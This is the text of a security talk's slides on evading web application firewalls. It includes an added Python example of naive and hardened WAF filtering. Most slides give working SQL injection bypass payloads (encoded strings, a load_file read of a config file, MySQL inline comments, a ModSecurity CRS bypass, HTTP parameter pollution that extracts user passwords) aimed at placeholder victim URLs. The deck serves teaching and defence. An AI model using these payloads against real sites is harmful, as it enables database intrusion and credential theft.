1. Web Application Firewall (WAF)
Suckseed or Succeed !?
Mr. Prathan Phongthiproek
Consulting Manager, Red Team
ACIS Professional Center
2. Who am I ?
ACIS Professional Center
Manager of the Red Team
Specializing in Attack & Penetration
Information Security Consulting Manager
Instructor and Speaker
Founder of CWH Underground Hacker
Aka 0x7a657133756c
3. Let’s Reveal
Introduction to Web Application
Firewall (WAF)
Breach it !!
Filter Evasion
HTTP Parameter Contamination
HTTP Pollution: Split and Join
Conclusion
5. Web Application Hacking
7 of 10 sites are vulnerable
70% of Cyber attacks are on web ports
95% of companies are hacked through web ports
Anonymous and LulzSec
Hackers behind Operation #AntiSec
6. Web Application Hacking
Top 3 Web App Attacks
Cross Site Scripting
File Inclusion (Remote/Local)
SQL Injection (Normal/Blind/Time based/Regex...)
8. What’s WAF ?
Emerged from IDS/IPS, focused on the HTTP protocol and HTTP-related attacks
Usually contains a lot of complex regexp rules to match (blacklist)
For most WAF vendors the rules are “closely guarded secrets”
Open-source WAFs (ModSecurity and PHPIDS) have open-source rules
13. Breach it !! (CMS and WAFs)
“We've got it under control, we've got it under con....... it's burst!”
14. Filter Evasion (SQLi)
PHP: magic_quotes on, mysql_real_escape_string, addslashes
' " -> \' \"
id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='users'
15. Filter Evasion (SQLi)
PHP: magic_quotes on, mysql_real_escape_string, addslashes
' " -> \' \"
id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273
16. Filter Evasion (SQLi)
PHP: magic_quotes on, mysql_real_escape_string, addslashes
String to ASCII codes (CHAR())
id=1 and 1=2 union select 1,load_file(CHAR(47,118,97,114,47,119,119,119,47,104,116,109,108,47,99,111,110,102,105,103,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112))
20. Filter Evasion (SQLi)
Inline comments (/*!......*/)
A lot of WAFs were bypassed
Bypasses IPS and timeouts
MySQL only (http://dev.mysql.com/doc/refman/5.0/en/comments.html)
/union\sselect/ig
id=1/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables/*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--
28. Filter Evasion (SQLi)
Case Study: ModSecurity CRS
http://victim.com/news.php?id=0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user
0 div 1 union#foo*/*bar
select#foo
1,2,current_user
0 div 1 union select 1,2,current_user
32. HTTP Parameter Contamination
Case Study: AQTRONIX Webknight
http://victim.com/news.asp?id=10 an%d 1=0/(sel%ect top 1 tab%le_name fr%om inform%ation_schema.tables)
10 an%d 1=0/(sel%ect top 1 tab%le_name fr%om inform%ation_schema.tables)
10 and 1=0/(select top 1 table_name from information_schema.tables)
33. HTTP Pollution: Split and Join
HPP is a quite simple but effective hacking technique
HPP attacks can be defined as the feasibility to override or add HTTP GET/POST parameters by injecting query string delimiters
Focus on ASP/ASP.NET
A lot of WAFs were bypassed
37. HTTP Pollution: Split and Join
Basic Attack
Forbidden: http://victim.com/search.aspx?q=select name,password from user
Bypass: http://victim.com/search.aspx?q=select name&q=password from user
q=select name
q=password from user
q=select name,password from user
38. HTTP Pollution: Split and Join
HPP+Inline Comment (Bypass Commercial WAF)
Forbidden: http://victim.com/search.aspx?q=select name,password from user
Bypass: http://victim.com/search.aspx?q=select/*&q=*/name&q=password/*&q=*/from/*&q=*/user
q=select/*
q=*/name
q=password/*
q=*/from/*
q=*/user
q=select/*,*/name,password/*,*/from/*,*/user
q=select name,password from user
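As an added, defender-side example (not part of the deck): a small Python model of why a WAF that matches each parameter value on its own, without decoding comments, misses the split and comment-wrapped payloads shown above, and how normalising the request the way the backend does (ASP.NET joins repeated parameters with ",", MySQL executes /*!...*/ bodies and drops #-comments) closes the gap. The blacklist rules here are constructed, modelled on the deck's /union\sselect/ig rule, and the comment stripping is a regex approximation of the MySQL lexer.

```python
import re
from urllib.parse import parse_qsl

# Constructed blacklist: the deck's /union\sselect/ig rule plus a
# "select ... from" pattern for the search.aspx case. Real rule sets are larger.
SQLI_RULES = [
    re.compile(r"union\s+select", re.I),
    re.compile(r"select\s+.+\s+from\s+", re.I),
]

def blacklist_hit(text):
    """True if any rule matches the text exactly as given."""
    return any(rule.search(text) for rule in SQLI_RULES)

def naive_waf(query):
    """Per-occurrence inspection: every q=... value is matched on its own,
    so split payloads and comment-wrapped keywords slip through."""
    return any(blacklist_hit(v) for _, v in parse_qsl(query, keep_blank_values=True))

def aspnet_join(query):
    """Rebuild what ASP.NET hands the application: repeated parameter
    names are joined into one value with ','."""
    params = {}
    for name, value in parse_qsl(query, keep_blank_values=True):
        params[name] = params[name] + "," + value if name in params else value
    return params

def normalize_mysql(sql):
    """Reduce MySQL comment tricks to roughly what the server executes:
    /*!...*/ bodies run, so they are unwrapped; plain /*...*/ and
    #...newline comments become a space; whitespace is collapsed.
    Regex approximation of the lexer, not a full tokenizer."""
    sql = re.sub(r"/\*!\s*(.*?)\s*\*/", r" \1 ", sql, flags=re.S)
    sql = re.sub(r"/\*.*?\*/", " ", sql, flags=re.S)
    sql = re.sub(r"#[^\r\n]*(\r?\n|$)", " ", sql)
    return re.sub(r"\s+", " ", sql).strip()

def hardened_waf(query):
    """Normalise like the backend (join, then de-comment), then match."""
    return any(blacklist_hit(normalize_mysql(v)) for v in aspnet_join(query).values())

if __name__ == "__main__":
    # Query strings taken from the slides above (HPP split, HPP + inline
    # comment, ModSecurity CRS case) plus a benign search.
    for q in ["q=select name&q=password from user",
              "q=select/*&q=*/name&q=password/*&q=*/from/*&q=*/user",
              "id=0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user",
              "q=hello world"]:
        print(f"naive={naive_waf(q)!s:5} hardened={hardened_waf(q)!s:5} {q}")
```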
42. How to protect your website ?
Implement a Secure Software Development Life Cycle (SSDLC)
Secure coding: validate all inputs and outputs
Pentest before going online
Harden it !!
Re-visit again
Deploy a WAF (optional)
43. Conclusion
WAF is not the long-expected
Due to its functional limitations, a WAF is not able to protect a web app from all possible vulnerabilities
It’s necessary to adapt the WAF filters to the particular web app being protected
A WAF doesn’t eliminate a vulnerability, it just partly screens the attack vector
It suckseed or succeed !?
“Security products are not able to 100% protect from damn config/coding of admins. It just needs time and imagination to breach it !!”